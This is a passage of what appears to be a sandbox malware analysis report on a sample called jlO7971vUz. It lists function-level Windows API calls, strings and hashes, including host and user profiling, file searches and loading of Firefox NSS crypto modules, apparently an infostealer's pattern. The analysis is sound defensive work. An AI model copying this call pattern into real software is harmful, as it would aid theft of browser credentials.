Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 12cebca5709a4bd67d42e1f430b54d4097e1cacebbb48c949c3d05d599d2a42c
Instruction ID: 82bc05057abf1d1b3722fee89f183bb51394f9c5901ce44602fc89bfe10ba604
Opcode Fuzzy Hash: 12cebca5709a4bd67d42e1f430b54d4097e1cacebbb48c949c3d05d599d2a42c
Instruction Fuzzy Hash: 0E712F729101099BCF15EBA0DC98EEFF379AF24300F40455CA20267298EF746A09CB62

Function 017E6070 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(017E67CE,017E67CE,00003000,00000040), ref: 017E6116
VirtualAlloc.KERNEL32(00000000,017E67CE,00003000,00000040), ref: 017E6163

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0be516237d3946cb67f0eb35404b84601ca60af1a88203225e16401b2a022b3c
Instruction ID: 0800746ff8aabd2c989185ea2b7d8ea5fde9cfb75d899a1a8b1a56305da95ca0
Opcode Fuzzy Hash: 0be516237d3946cb67f0eb35404b84601ca60af1a88203225e16401b2a022b3c
Instruction Fuzzy Hash: C341A774A00209EFCB55CF58C494BADFBF1FB48314F1486A9E9599B346D731EA81CB84

Function 017E1060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,017E110E,?,?,017F494C), ref: 017E1073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,017E110E,?,?,017F494C), ref: 017E10B7

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c2c124f75ded9cea3b30464772b13e702d16616e18bc963fa5e88ada0c71c6bb
Instruction ID: 23f3f7e7b68c1a9bfbd6bcfcc76414fd8528a0af17b5a5eed926d12fc05ac373
Opcode Fuzzy Hash: c2c124f75ded9cea3b30464772b13e702d16616e18bc963fa5e88ada0c71c6bb
Instruction Fuzzy Hash: D3F0E9B1641204BBE71496B85C5DFAFF7DCA705B04F304548F640E7280D6719E008B50

Function 017F6CA0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,017EF807,?,00000000,?,00000000,017FE783,017FE782), ref: 017F6CAF

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d506ed18c757cfe2a5ea4319a579f8d3d678cf2191b22f85c5eaaa096991f81e
Instruction ID: fa735f34d9ce30abb4a7c3afb3f9012001006f84143d4a75e0e12eb319fdcf55
Opcode Fuzzy Hash: d506ed18c757cfe2a5ea4319a579f8d3d678cf2191b22f85c5eaaa096991f81e
Instruction Fuzzy Hash: B5F0F270C00208ABCF00EFA8D55869EBB74EF10310F008199A9656B380DB74AA49DB82

Function 017F6CF0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: f84a1b99ee4fafeb9dcd7d571823722b01ba6b709808dc0ae058141f09f0dc71
Instruction ID: e03a21b4ce1f14a9caafe7c1e7931b58b1b62a26d2891355d94ad3e0b9781e36
Opcode Fuzzy Hash: f84a1b99ee4fafeb9dcd7d571823722b01ba6b709808dc0ae058141f09f0dc71
Instruction Fuzzy Hash: 07E0127198034CABEB51DB50CC95F9E737C9B44B11F004294BA0C5B2C4EA70AB458B91

Function 017E1150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 017F57B0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017F495B), ref: 017F57E0
Part of subcall function 017F57B0: HeapAlloc.KERNEL32(00000000,?,?,?,017F495B), ref: 017F57E7
Part of subcall function 017F57B0: GetComputerNameA.KERNEL32(?,00000104), ref: 017F57FF

Part of subcall function 017F5720: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017E1177), ref: 017F5750
Part of subcall function 017F5720: HeapAlloc.KERNEL32(00000000,?,?,?,017E1177), ref: 017F5757
Part of subcall function 017F5720: GetUserNameA.ADVAPI32(00000104,00000104), ref: 017F576F

ExitProcess.KERNEL32 ref: 017E1186

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 30ff9dea6abce21bafe56a112fb2e765d43fe49ace33ed1628004ce0103de5e1
Instruction ID: ae065aff44b23acb0ee098a622c650956c2c225b7a6f9765dac2f02f9576e717
Opcode Fuzzy Hash: 30ff9dea6abce21bafe56a112fb2e765d43fe49ace33ed1628004ce0103de5e1
Instruction Fuzzy Hash: CDE01279D04305A2D951B3B5AD4DB57B68C9B28205F80441CBA04C720AF935F0064B75

Function 017F6D40 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 017F6D62

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: ef52ae23c58395e954a3f7ad14d13d7603bc5d3a5175431240b6ab55bb301d0c
Instruction ID: 3a5763e799e98b4deb7f69771f800333cf1d5866505913eccb41d26ffa6724af
Opcode Fuzzy Hash: ef52ae23c58395e954a3f7ad14d13d7603bc5d3a5175431240b6ab55bb301d0c
Instruction Fuzzy Hash: D601F234904208EBDF05CF98C599BADBBB1EF04308F288188EA096B381D374AAC4DB45

Function 017F6800 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 017F6808

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: b66376c0df900dbdd0fedc67e1731d8639550e1698b8ed45a6eb111bbb09d6ea
Instruction ID: 859f7ba7e9a57c08a1a739dc9a793e6c7e0b8364dd1b6c253a5af1de8f20f525
Opcode Fuzzy Hash: b66376c0df900dbdd0fedc67e1731d8639550e1698b8ed45a6eb111bbb09d6ea
Instruction Fuzzy Hash: 9DC012B090410CFB8B00CF98E80584A77ECDB05210B004194FC0DC3300D532AE1087A5

Non-executed Functions

Function 6C566E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6B2120,6C567E60), ref: 6C566EBC
TlsGetValue.KERNEL32 ref: 6C566EDF
EnterCriticalSection.KERNEL32(?), ref: 6C566EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C566F25

Part of subcall function 6C53A900: TlsGetValue.KERNEL32(00000000,?,6C6B14E4,?,6C4D4DD9), ref: 6C53A90F
Part of subcall function 6C53A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C53A94F

PR_Unlock.NSS3 ref: 6C566F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C566FA9
TlsGetValue.KERNEL32 ref: 6C5670B4
EnterCriticalSection.KERNEL32(?), ref: 6C5670C8
PR_CallOnce.NSS3(6C6B24C0,6C5A7590), ref: 6C567104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C567117
SECOID_Init.NSS3 ref: 6C567128
PORT_Alloc_Util.NSS3(00000057), ref: 6C56714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C56717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5671A9
PR_NotifyAllCondVar.NSS3 ref: 6C5671CF
PR_Unlock.NSS3 ref: 6C5671DD
free.MOZGLUE(?), ref: 6C5671EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C567208
free.MOZGLUE(00000000), ref: 6C567221
free.MOZGLUE(00000001), ref: 6C567235
TlsGetValue.KERNEL32 ref: 6C56724A
EnterCriticalSection.KERNEL32(?), ref: 6C56725E
PR_NotifyCondVar.NSS3 ref: 6C567273
PR_Unlock.NSS3 ref: 6C567281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C567291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5672B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5672D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5672E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C567301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C567310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C567335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C567344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C567363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C567372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C6A0148,,defaultModDB,internalKeySlot), ref: 6C5674CC
free.MOZGLUE(00000000), ref: 6C567513
free.MOZGLUE(00000000), ref: 6C56751B
free.MOZGLUE(00000000), ref: 6C567528
free.MOZGLUE(00000000), ref: 6C56753C
free.MOZGLUE(00000000), ref: 6C567550
free.MOZGLUE(00000000), ref: 6C567561
free.MOZGLUE(00000000), ref: 6C567572
free.MOZGLUE(00000000), ref: 6C567583
free.MOZGLUE(00000000), ref: 6C567594
free.MOZGLUE(00000000), ref: 6C5675A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C5675BD
free.MOZGLUE(00000000), ref: 6C5675C8
free.MOZGLUE(00000000), ref: 6C5675F1
PR_NewLock.NSS3 ref: 6C567636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C567686
PR_NewLock.NSS3 ref: 6C5676A2

Part of subcall function 6C6198D0: calloc.MOZGLUE(00000001,00000084,6C540936,00000001,?,6C54102C), ref: 6C6198E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C5676B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C567707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C56771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C567731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C56774A
DeleteCriticalSection.KERNEL32(?), ref: 6C567770
free.MOZGLUE(?), ref: 6C567779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C56779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5677AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C5677C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5677DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C567821
PORT_Alloc_Util.NSS3(?), ref: 6C567837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C56785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C56786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C5678AC
free.MOZGLUE(00000000), ref: 6C5678BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C5678F3
free.MOZGLUE(00000000), ref: 6C5678FC
free.MOZGLUE(00000000), ref: 6C56791C

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

Strings

Spac, xrefs: 6C567389
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C5674C7
dll, xrefs: 6C56788E
kbi., xrefs: 6C567886
extern:, xrefs: 6C56772B
sql:, xrefs: 6C5676FE
NSS Internal Module, xrefs: 6C5674A2, 6C5674C6
rdb:, xrefs: 6C567744
dbm:, xrefs: 6C567716
,defaultModDB,internalKeySlot, xrefs: 6C56748D, 6C5674AA

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: facb43eaa9d67cbdaadcebfcdb39ceb7ae17f5be4e7df20c9b7951684bfd4127
Instruction ID: 63ae18043fba52edb25c45ad5e17d6ba3be5fbb2c972eec327094d084fb88a15
Opcode Fuzzy Hash: facb43eaa9d67cbdaadcebfcdb39ceb7ae17f5be4e7df20c9b7951684bfd4127
Instruction Fuzzy Hash: 165204B1E00201ABEF108FA6DC457AE7BF4AF05388F144524ED19A6F61E731D954CB9A

Function 6C5B4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C59601B,?,00000000,?), ref: 6C5B486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C5B48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C5B48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C5B48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C5B48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C5B490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C5B4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C5B493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B4970
PORT_Alloc_Util.NSS3(00000001), ref: 6C5B49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C5B49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C5B49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C5B4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C5B4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C5B4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C5B4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C5B4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C5B4A81
free.MOZGLUE(00000000), ref: 6C5B4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C5B4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C5B4ADC
free.MOZGLUE(00000000), ref: 6C5B4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C5B4B33

Part of subcall function 6C5B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B413D
Part of subcall function 6C5B4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5B4162
Part of subcall function 6C5B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B416B
Part of subcall function 6C5B4120: PL_strncasecmp.NSS3(2B[l,?,00000001), ref: 6C5B4187
Part of subcall function 6C5B4120: NSSUTIL_ArgSkipParameter.NSS3(2B[l), ref: 6C5B41A0
Part of subcall function 6C5B4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B41B4
Part of subcall function 6C5B4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C5B41CC
Part of subcall function 6C5B4120: NSSUTIL_ArgFetchValue.NSS3(2B[l,?), ref: 6C5B4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C5B4B53
free.MOZGLUE(00000000), ref: 6C5B4B94
free.MOZGLUE(?), ref: 6C5B4BA7
free.MOZGLUE(00000000), ref: 6C5B4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B4BC8

Strings

hasRootCerts, xrefs: 6C5B4AD6
timeout, xrefs: 6C5B4A38, 6C5B4A7B
hasRootTrust, xrefs: 6C5B4B4D
rootFlags, xrefs: 6C5B4AB9, 6C5B4B2E
askpw, xrefs: 6C5B4A4A
every, xrefs: 6C5B4A66
slotFlags, xrefs: 6C5B4A22

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: e441b7e64aaf282a1dccc2d8763f7f139807ccb09117e4f0d76f7eb0af0b64bf
Instruction ID: adeee50ba8a44428b48824ba2a5f093c310c3ff0d0a465eaebb25a3d2a52fbe6
Opcode Fuzzy Hash: e441b7e64aaf282a1dccc2d8763f7f139807ccb09117e4f0d76f7eb0af0b64bf
Instruction Fuzzy Hash: A4C11570E452559BEF20CFA99CA0BAE7FB8AF46308F140429E945B7B01E731A914C7A5

Function 6C576D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C67A8EC,0000006C), ref: 6C576DC6
memcpy.VCRUNTIME140(?,6C67A958,0000006C), ref: 6C576DDB
memcpy.VCRUNTIME140(?,6C67A9C4,00000078), ref: 6C576DF1
memcpy.VCRUNTIME140(?,6C67AA3C,0000006C), ref: 6C576E06
memcpy.VCRUNTIME140(?,6C67AAA8,00000060), ref: 6C576E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C576E38

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C576E76
TlsGetValue.KERNEL32 ref: 6C57726F
EnterCriticalSection.KERNEL32(?), ref: 6C577283

Strings

!, xrefs: 6C577123

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 08f53d753dbb9a29b5172e6c40f9a965107c727830284f36dfdc0a5578efedfd
Instruction ID: 54ccb9fbf6e591ea221ca81f66996164ed0ecf04b6d883cc57a030222895529c
Opcode Fuzzy Hash: 08f53d753dbb9a29b5172e6c40f9a965107c727830284f36dfdc0a5578efedfd
Instruction Fuzzy Hash: 3A728C75D052199FDB61CF29DC8879ABBB5EB49304F1041E9E80DA7701EB31AAC4CFA1

Function 017F2630 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 017F2649
FindFirstFileA.KERNEL32(?,?), ref: 017F2660
lstrcat.KERNEL32(?,?), ref: 017F26B2
StrCmpCA.SHLWAPI(?,017FE858), ref: 017F26C4
StrCmpCA.SHLWAPI(?,017FE85C), ref: 017F26DA
FindNextFileA.KERNEL32(000000FF,?), ref: 017F2960
FindClose.KERNEL32(000000FF), ref: 017F2975

Strings

%s\%s, xrefs: 017F26F4
%s\%s\%s, xrefs: 017F27BB
%s%s, xrefs: 017F2818
%s\%s, xrefs: 017F27DD
%s\*, xrefs: 017F263D

Memory Dump Source

